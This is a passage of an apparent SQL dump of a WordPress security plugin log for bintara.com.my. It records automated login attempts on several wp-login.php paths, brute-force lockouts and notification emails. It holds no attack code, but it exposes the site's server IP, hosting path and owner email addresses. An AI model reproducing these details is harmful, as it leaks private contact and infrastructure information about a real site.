empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYz5XkXpgmG5P@iB8k@MwAAAJY\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"13.127.28.163\";s:11:\"REMOTE_PORT\";s:5:\"34218\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYz5XkXpgmG5P@iB8k@MwAAAJY\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569076197.6852\";s:12:\"REQUEST_TIME\";s:10:\"1569076197\";}}','notice','2019-09-21 14:29:59','2019-09-21 14:29:58',18155576,19644408,'https://bintara.com.my/blog/wp-login.php',1,0,'13.127.28.163'),(26286,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:29:58\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:29:58\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:29:58\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:29:58\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:29:59','2019-09-21 14:29:58',18240376,19644408,'https://bintara.com.my/blog/wp-login.php',1,0,'13.127.28.163'),(26287,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:29:59','2019-09-21 14:29:58',18447328,19644408,'https://bintara.com.my/blog/wp-login.php',1,0,'13.127.28.163'),(26288,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYz@nkXpgmG5P@iB8k@PQAAAJM\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"212.227.20.208\";s:11:\"REMOTE_PORT\";s:5:\"37377\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYz@nkXpgmG5P@iB8k@PQAAAJM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569076218.8809\";s:12:\"REQUEST_TIME\";s:10:\"1569076218\";}}','notice','2019-09-21 14:30:20','2019-09-21 14:30:19',18157472,19646368,'https://bintara.com.my/2019/wp-login.php',1,0,'212.227.20.208'),(26289,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:30:19\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:30:19\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:30:19\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:30:19\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:30:20','2019-09-21 14:30:19',18242472,19646368,'https://bintara.com.my/2019/wp-login.php',1,0,'212.227.20.208'),(26290,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:30:20','2019-09-21 14:30:19',18449168,19646368,'https://bintara.com.my/2019/wp-login.php',1,0,'212.227.20.208'),(26291,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYz-zDrcQxTmGrCWuaVNQAAAcc\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"207.180.205.248\";s:11:\"REMOTE_PORT\";s:5:\"35316\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYz-zDrcQxTmGrCWuaVNQAAAcc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569076223.3247\";s:12:\"REQUEST_TIME\";s:10:\"1569076223\";}}','notice','2019-09-21 14:30:24','2019-09-21 14:30:23',18160480,19645248,'https://bintara.com.my/test/wp-login.php',1,0,'207.180.205.248'),(26292,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:30:23\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:30:23\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:30:23\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:30:23\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:30:24','2019-09-21 14:30:23',18245264,19645248,'https://bintara.com.my/test/wp-login.php',1,0,'207.180.205.248'),(26293,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:30:24','2019-09-21 14:30:23',18451648,19645248,'https://bintara.com.my/test/wp-login.php',1,0,'207.180.205.248'),(26294,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"99\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY0PFiJ7D9Gn7wDPh8myQAAANc\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"188.166.181.139\";s:11:\"REMOTE_PORT\";s:5:\"36656\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY0PFiJ7D9Gn7wDPh8myQAAANc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569076284.5369\";s:12:\"REQUEST_TIME\";s:10:\"1569076284\";}}','notice','2019-09-21 14:31:25','2019-09-21 14:31:24',18157616,19644632,'https://bintara.com.my/blog/wp-login.php',1,0,'188.166.181.139'),(26295,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:31:24\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:31:24\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:31:24\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:31:24\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:31:25','2019-09-21 14:31:24',18242344,19644632,'https://bintara.com.my/blog/wp-login.php',1,0,'188.166.181.139'),(26296,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:31:25','2019-09-21 14:31:24',18448760,19644632,'https://bintara.com.my/blog/wp-login.php',1,0,'188.166.181.139'),(26297,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"104\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY0UHkXpgmG5P@iB8k@1QAAAIs\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:11:\"198.1.66.35\";s:11:\"REMOTE_PORT\";s:5:\"58852\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY0UHkXpgmG5P@iB8k@1QAAAIs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569076304.3428\";s:12:\"REQUEST_TIME\";s:10:\"1569076304\";}}','notice','2019-09-21 14:31:45','2019-09-21 14:31:44',18157832,19646304,'https://bintara.com.my/wordpress/wp-login.php',1,0,'198.1.66.35'),(26298,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 22:31:44\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 14:31:44\";s:14:\"lockout_expire\";s:19:\"2019-09-26 02:31:44\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-25 18:31:44\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 14:31:45','2019-09-21 14:31:44',18242752,19646304,'https://bintara.com.my/wordpress/wp-login.php',1,0,'198.1.66.35'),(26299,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 14:31:46','2019-09-21 14:31:44',18449160,19646304,'https://bintara.com.my/wordpress/wp-login.php',1,0,'198.1.66.35'),(26300,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYY0VTDrcQxTmGrCWuaVPwAAAcc\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"222.239.90.55\";s:11:\"REMOTE_PORT\";s:5:\"36474\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYY0VTDrcQxTmGrCWuaVPwAAAcc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1569076309.451\";s:12:\"REQUEST_TIME\";s:10:\"1569076309\";}}','notice','2019-09-21 14:31:50','2019-09-21 14:31:49',18154192,19644616,'https://bintara.com.my/wp/wp-login.php',1,0,'222.239.90.55'),(26301,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login 